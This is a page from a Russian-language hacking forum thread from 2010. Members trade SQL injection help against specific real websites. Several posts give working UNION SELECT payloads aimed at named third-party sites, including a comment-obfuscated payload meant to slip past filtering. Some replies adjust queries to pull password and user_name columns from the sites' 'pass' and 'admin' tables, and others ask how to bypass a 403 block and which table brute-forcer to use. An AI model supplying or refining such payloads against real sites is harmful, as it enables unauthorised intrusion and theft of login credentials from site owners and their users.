HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1406 из 2422 « Первая < 406906130613561396 1402 1403 1404 1405 1406 1407 1408 1409 1410 14161456150619062406 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.07.2010, 10:21
linuxkernal
Новичок
Регистрация: 12.03.2010
Сообщений: 7
С нами: 8509359

Репутация: 0
По умолчанию
website is vulnerable

sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1

i use command order by and i got 23 columns but when i paste link in browser like this

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

page load normally and i can not see printable field

can help me what i am doing mistake
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.07.2010, 10:30
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
*.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

try to put(deliver) -

*.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
 
Ответить с цитированием

  #3  
Старый 14.07.2010, 10:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от linuxkernal  
website is vulnerable
sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
i use command order by and i got 23 columns but when i paste link in browser like this
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
page load normally and i can not see printable field
can help me what i am doing mistake
linuxkernel это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.

-------

linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted
 
Ответить с цитированием

  #4  
Старый 14.07.2010, 12:37
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
 
Ответить с цитированием

  #5  
Старый 14.07.2010, 12:45
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
вы издеваетесь что ли? я же написал выше, не писать на английском!!!!

linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда

Цитата:
Сообщение от winstrool  
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
для этих целей используют SIPT
 
Ответить с цитированием

  #6  
Старый 14.07.2010, 14:55
boberko
Новичок
Регистрация: 24.01.2009
Сообщений: 10
С нами: 9102279

Репутация: 1
По умолчанию
Прошу помощи:

Нашел вроде скуль:

_http://dovidka.if.ua/rubric.php?id=86'

Но не могу подобрать колонки? в чем проблема?
 
Ответить с цитированием

  #7  
Старый 14.07.2010, 15:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от boberko  
Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?
http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7
 
Ответить с цитированием

  #8  
Старый 14.07.2010, 15:15
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
Код:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз
 
Ответить с цитированием

  #9  
Старый 14.07.2010, 17:36
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами: 8399502

Репутация: 0
По умолчанию
Код:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.

А вот так:

Код:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.

Как обойти?
 
Ответить с цитированием

  #10  
Старый 14.07.2010, 17:41
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию
Цитата:
Сообщение от Seravin  
Код:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
 
Ответить с цитированием
Ответ
Страница 1406 из 2422 « Первая < 406906130613561396 1402 1403 1404 1405 1406 1407 1408 1409 1410 14161456150619062406 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.